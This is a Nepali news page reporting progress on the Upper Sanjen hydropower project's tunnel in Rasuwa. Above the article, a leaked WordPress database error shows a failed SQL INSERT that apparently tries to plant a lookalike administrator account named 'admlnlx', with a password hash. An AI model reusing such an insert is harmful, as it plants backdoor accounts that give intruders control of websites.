WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8/rXyURj3QX.pR7Bae/JSdgF5rWzO/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 12:11:57', '', 'admlnlx', 'admlnlx')
रसुवा, माघ ५ –
रसुवाको चिलिमेमा निमार्णाधिन माथिल्लो साङजेन जलविद्युत आयोजनाको सुरूङको काम ९० प्रतिशत पूरा भएको छ ।
१४.८ मेगावट क्षमताको आयोजनाको १ हजार ३ सय मिटर सुरुङमार्गमध्ये झण्डै १ हजार १ सय मिटरको काम पूरा भइसकेको आयोजनाले जनाएको छ । आयोजनका प्रमुख कार्यकारी अधिकृत किरण कुमार श्रेष्ठका अनुसार आगामी फागुनको अन्तिममासम्ममा सुरूङको काम सम्पन्न हुनेछ ।
२०६९ सालदेखि निमार्ण कार्य सुरु भएको आयोजनाको काम भूकम्प र नाकाबन्दीका कारण एक वर्षसम्म प्रभावित भएको भए पनि लक्ष्य अनुसार काम सम्पन्न गर्नका लागि निमार्ण कार्यलाई गति दिइएको आयोजनाका प्रमुख कार्यकारी अधिकृत श्रेष्ठले जानकारी दिनुभयो । २०७५ सम्ममा निमार्ण सम्पन्न हुने आयोजनाले जनाएको छ ।